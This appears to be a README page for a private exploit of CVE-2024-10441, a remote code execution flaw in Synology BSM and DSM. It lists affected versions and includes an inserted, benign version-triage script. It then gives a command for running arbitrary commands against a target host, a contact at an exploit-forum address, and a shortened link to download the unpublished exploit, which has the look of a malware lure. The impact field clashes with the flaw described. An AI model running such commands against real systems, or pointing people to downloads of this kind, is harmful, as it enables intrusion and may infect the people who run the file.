# Improper Encoding or Escaping of Output (CVE-2024-10441)
## Overview
An improper encoding or escaping of output vulnerability exists in the system plugin daemon of Synology products, specifically affecting BeeStation Manager (BSM), DiskStation Manager (DSM), and Unified Controller (DSMUC). The vulnerability allows remote attackers to execute arbitrary code through unspecified attack vectors.
## Details
- **CVE ID**: [CVE-2024-10441](https://nvd.nist.gov/vuln/detail/CVE-2024-10441)
- **Discovered**: 2025-03-17
- **Published**: 2025-03-18
- **Impact**: Confidentiality
- **Exploit Availability**: Not public, only private.
## Vulnerability Description
Improper encoding or escaping of output vulnerability in the system plugin daemon in Synology BeeStation OS (BSM) before 1.1-65374 and Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1 allows remote attackers to execute arbitrary code via unspecified vectors.
## Affected Versions
- Synology BeeStation OS (BSM) before 1.1-65374
- Synology DiskStation Manager (DSM) before 7.2-64570-4, 7.2.1-69057-6 and 7.2.2-72806-1
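
For asset triage, the version boundaries above can be checked against an inventory. This is an added example, not part of the original repository; it assumes version strings follow the `<branch>-<build>[-<update>]` notation used on this page, and the host names and inventory rows are constructed. Branches the page does not list are reported as `unknown` rather than guessed.

```python
import re

# Fixed releases as listed on this page: product -> branch -> (build, update).
FIXED = {
    "BSM": {"1.1": (65374, 0)},
    "DSM": {"7.2": (64570, 4), "7.2.1": (69057, 6), "7.2.2": (72806, 1)},
}

# Assumed string shape, following the page's notation: <branch>-<build>[-<update>]
VERSION_RE = re.compile(r"^(\d+(?:\.\d+)+)-(\d+)(?:-(\d+))?$")


def parse_version(text):
    """Split '7.2.1-69057-6' into ('7.2.1', 69057, 6); update defaults to 0."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError(f"unrecognized version string: {text!r}")
    return m.group(1), int(m.group(2)), int(m.group(3) or 0)


def status(product, version):
    """Return 'affected', 'fixed', or 'unknown' for one product/version pair."""
    branch, build, update = parse_version(version)
    fixed = FIXED.get(product.upper(), {}).get(branch)
    if fixed is None:
        # Branch not named on the page: do not guess either way.
        return "unknown"
    return "affected" if (build, update) < fixed else "fixed"


def triage(inventory):
    """Map each (host, product, version) row to its status."""
    results = {}
    for host, product, version in inventory:
        try:
            results[host] = status(product, version)
        except ValueError:
            results[host] = "unknown"  # unparseable strings need manual review
    return results


if __name__ == "__main__":
    sample = [  # constructed inventory, for illustration only
        ("nas-01", "DSM", "7.2.1-69057-5"),
        ("nas-02", "DSM", "7.2.2-72806-1"),
        ("bee-01", "BSM", "1.1-65373"),
    ]
    for host, result in triage(sample).items():
        print(f"{host}: {result}")
```
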
## Running
To run the exploit, you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'uname -a'
```
## Contact
For inquiries, please contact **cybersecuritist@exploit.in**
## Exploit:
### [Download here](https://bit.ly/43ApbAH)